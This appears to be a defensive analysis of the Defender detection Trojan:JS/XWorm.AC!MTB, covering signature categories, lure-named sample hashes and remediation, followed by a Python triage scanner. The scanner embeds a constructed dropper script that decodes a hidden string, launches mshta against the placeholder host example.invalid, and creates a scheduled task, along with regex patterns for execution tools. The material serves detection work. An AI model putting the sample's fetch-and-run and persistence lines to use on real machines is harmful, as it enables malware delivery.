$ analyze-threat Trojan:JS/XWorm.AC!MTB
Trojan:JS/XWorm.AC!MTB - Windows Defender threat signature analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:JS/XWorm.AC!MTB
Classification:
Type: Trojan
Platform: JS (JavaScript/JScript; on Windows a .js attachment is run by the Windows Script Host, wscript.exe)
Family: XWorm
Detection Type: Concrete
Known malware family with identified signatures
Variant: AC
Specific signature variant within the malware family
Suffix: !MTB
Suffix the report associates with machine-learning and behavioral analysis; note that the VDM entry below is a static string signature, so this detection fires on file content rather than on observed runtime behavior
Detection Method: Static (PEHSTR_EXT string patterns in the VDM; see VDM Static Detection below)
Confidence: Very High
False-Positive Risk: Low

Concrete signature match: Trojan (code that appears legitimate but performs malicious actions), platform JavaScript, family XWorm.

Summary:

This is a JavaScript (.js, Windows Script Host) stage attributed to the XWorm family. The string signature covers code for hooking, data encoding and decoding, invocation of legitimate Windows utilities (mshta, regsvr32, rundll32, PowerShell, BITS jobs) for execution and download, scheduled tasks for persistence, remote file copy for staging, and file deletion for cleanup. Every listed sample carries a double-extension lure name (invoice-<number>.pdf (NN).js) so that the script passes as a PDF invoice in a mail client. XWorm itself is a commodity remote-access trojan, so the JS stage is most plausibly a loader whose goal is initial compromise followed by remote control and data theft. The detection is concrete (named family, fixed string patterns) with a low false-positive risk.

Severity:
Critical
VDM Static Detection:
Signature records referenced by this VDM entry (NID and PEHSTR_EXT are the record types; entries of the form !#HSTR:StringCodeFor* reference shared sub-signatures by name, so the names below describe what the file contains rather than literal strings in it):
 - |#d1e49aac-8f56-4280-b9ba-993a6d77406c (NID)
 - }#d1e49aac-8f56-4280-b9ba-993a6d77406c (NID)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
Filename: invoice-1645080830.pdf (68).js
SHA-256: f62d9c7f800ba268f5615d41c002bf8365986e6fca9ae1677219b2097446059b
Date: 29/12/2025
Filename: invoice-1645080830.pdf (69).js
SHA-256: 8da92fed7f92fb1ffcac455e0a5f3d543a763de17462138c121b60e0f689ae91
Date: 29/12/2025
Filename: invoice-1645080830.pdf (67).js
SHA-256: 635389a65f98ee0cc269c09a9a7f9e9cc9e7cb40bd09dbc4cd88edc6e2633e18
Date: 29/12/2025
Filename: invoice-1645080830.pdf (63).js
SHA-256: c979471b42391b2d9564c39fd9eb3ad29922b341f065e269a4644065034eb5ff
Date: 29/12/2025
Filename: invoice-1645080830.pdf (64).js
SHA-256: 66c82affa993d16e42892f35c8fb5a0464641bf795090c2b4ca30057b43efc02
Date: 29/12/2025
Remediation Steps:
Isolate the affected host from the network immediately. Run a full scan with an updated Defender engine and signatures and remove every detected component. Because the JS stage runs under the Windows Script Host, review the wscript.exe/cscript.exe process tree for the child processes the signature anticipates (mshta, regsvr32, rundll32, powershell, bitsadmin) and hunt for the persistence and staging artifacts it names: scheduled tasks, BITS jobs (bitsadmin /list /allusers /verbose shows jobs of every user), Run-key entries, and recently copied or deleted files. Look for lateral movement and data exfiltration, and treat any credential used on the host as compromised. To reduce recurrence, block or quarantine .js/.jse attachments at the mail gateway, change the default handler for .js files from wscript.exe to a text editor on user workstations, enable the Defender attack surface reduction rule "Block JavaScript or VBScript from launching downloaded executable content", keep systems patched, and enforce application control.
=== END REPORT ===
This analysis was last updated on 26/12/2025.
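An offline triage helper, added here as an example and not code from threatcheck.sh or Microsoft, that mirrors the shape of the VDM entry above: a hash check against the five listed SHA-256 values, a static string scan organised by the same StringCodeFor* categories, and a check for the double-extension lure name the samples share. The regular expressions are this script's own assumptions about what each category name suggests; Defender's real sub-signatures are not public and are not reproduced. Hooking and ExecutionGuardrails are omitted because the page does not say what they match. The two scripts it scans are constructed for the example (the URL example.invalid is a placeholder), not the real samples.

```python
"""Offline triage of a suspicious .js attachment, modelled on the string
categories in the Trojan:JS/XWorm.AC!MTB VDM entry.

Added example, not code from threatcheck.sh or Microsoft. The regexes are
assumptions: rough stand-ins for what each StringCodeFor* label suggests.
"""
import hashlib
import re

# SHA-256 values listed under "Known malware" in the report.
KNOWN_SHA256 = {
    "f62d9c7f800ba268f5615d41c002bf8365986e6fca9ae1677219b2097446059b",
    "8da92fed7f92fb1ffcac455e0a5f3d543a763de17462138c121b60e0f689ae91",
    "635389a65f98ee0cc269c09a9a7f9e9cc9e7cb40bd09dbc4cd88edc6e2633e18",
    "c979471b42391b2d9564c39fd9eb3ad29922b341f065e269a4644065034eb5ff",
    "66c82affa993d16e42892f35c8fb5a0464641bf795090c2b4ca30057b43efc02",
}

# Category (named after the report's StringCodeFor* entries) -> assumed pattern.
INDICATORS = {
    "Mshta": r"\bmshta(?:\.exe)?\b",
    "Regsvr32": r"\bregsvr32(?:\.exe)?\b",
    "Rundll32": r"\brundll32(?:\.exe)?\b",
    "PowerShell": r"\bpowershell(?:\.exe)?\b|\bpwsh\b|-EncodedCommand\b|-enc\b",
    "BITSJobs": r"\bbitsadmin\b|Start-BitsTransfer",
    "ScheduledTask": r"\bschtasks\b|Schedule\.Service",
    "DataEncoding": r"fromCharCode|charCodeAt|\batob\(|base64",
    "RemoteFileCopy": r"MSXML2\.XMLHTTP|WinHttpRequest|ADODB\.Stream",
    "FileDeletion": r"DeleteFile|\.Delete\(|\bdel\b /[fq]",
}

# Double-extension lure used by every sample on the page: <doc>.pdf (NN).js
LURE_NAME = re.compile(r"\.(?:pdf|docx?|xlsx?|txt)(?:\s*\(\d+\))?\.jse?$", re.I)


def verdict(known: bool, lure: bool, hits: list) -> str:
    """A hash match is decisive; otherwise require corroborating evidence."""
    if known:
        return "known-malicious"
    if len(hits) >= 2 or (lure and hits):
        return "suspicious"
    return "no-static-match"


def triage(filename: str, content: bytes) -> dict:
    """Return hash, lure flag, matched categories and a verdict for one file."""
    digest = hashlib.sha256(content).hexdigest()
    text = content.decode("utf-8", errors="replace")
    hits = [name for name, pat in INDICATORS.items()
            if re.search(pat, text, re.IGNORECASE)]
    known = digest in KNOWN_SHA256
    lure = bool(LURE_NAME.search(filename))
    return {
        "filename": filename,
        "sha256": digest,
        "known_sample": known,
        "double_extension": lure,
        "indicators": hits,
        "verdict": verdict(known, lure, hits),
    }


# Constructed stand-in for a dropper script (not the real XWorm sample).
# "powershell" is assembled at runtime from char codes, so a static scan
# sees DataEncoding but never the word itself: the limit of string signatures.
SAMPLE_JS = b"""
var sh = new ActiveXObject("WScript.Shell");
var c = [112,111,119,101,114,115,104,101,108,108], d = "";
for (var i = 0; i < c.length; i++) d += String.fromCharCode(c[i]);
var cmd = "mshta.exe http://example.invalid/x.hta";
sh.Run(cmd, 0, false);
sh.Run("schtasks /create /sc minute /mo 5 /tn Updater /tr \\"" + cmd + "\\"", 0, false);
"""

# Constructed benign script for comparison.
BENIGN_JS = b"""
function add(a, b) { return a + b; }
WScript.Echo(add(2, 3));
"""

if __name__ == "__main__":
    for name, body in (("invoice-1645080830.pdf (68).js", SAMPLE_JS),
                       ("helper.js", BENIGN_JS)):
        print(triage(name, body))
```

Run it against a quarantined attachment by reading the file as bytes and passing its name and content to triage(). The constructed dropper hits Mshta, ScheduledTask and DataEncoding and is flagged suspicious; the PowerShell category never fires because the name only exists after String.fromCharCode runs, which is why the real signature pairs string patterns with the hash list and why a negative static result should not end an investigation.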